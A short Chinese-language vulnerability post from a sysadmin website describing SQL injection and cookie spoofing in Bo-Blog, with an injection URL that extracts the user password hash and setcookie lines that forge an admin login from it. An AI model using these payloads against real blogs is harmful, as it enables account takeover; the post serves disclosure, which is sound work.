54SA.COM|专注于系统运维管理,为中国SA提供动力!

54SA.COM|系统运维网

系统管理员之家Banner
当前位置: 主页 > Windows > 系统安全 > 漏洞补丁 >

boblog注入后COOKIE欺骗漏洞

分享到:
时间:2010-10-03 23:35来源:未知 作者:admin

    影响版本:boblog最新
    官方网站:http://www.bo-blog.com//
    漏洞类型:COOKIE欺骗
    漏洞描述:
    代码
    index.php代码
    if ($go) @list($job, $itemid)=@explode('_', basename($go));
    原本注入语句为 index.php?go=category_0) union select 1,concat(userpsw) from boblog_user%23
    也就是 经过explode处理后 假如数据库为boblog_user 最终只会成为 boblog
    更何况 存在注入漏洞的
    `category` in ({$all_needed_cates})");
    不会因为#符号而注析掉后面的东西 只会变成from boblog_user#) PS:可能因为这里我不会绕过
    COOKIES欺骗漏洞很简单
    假如某牛真的注入成功得到MD5密码不用去跑MD5了
    直接
    setcookie ('userid', '1',);
    setcookie ('userpsw', 'md5密文', );
    既可了……

[责任编辑:admin]

顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
用户名:
最新评论 进入详细评论页>>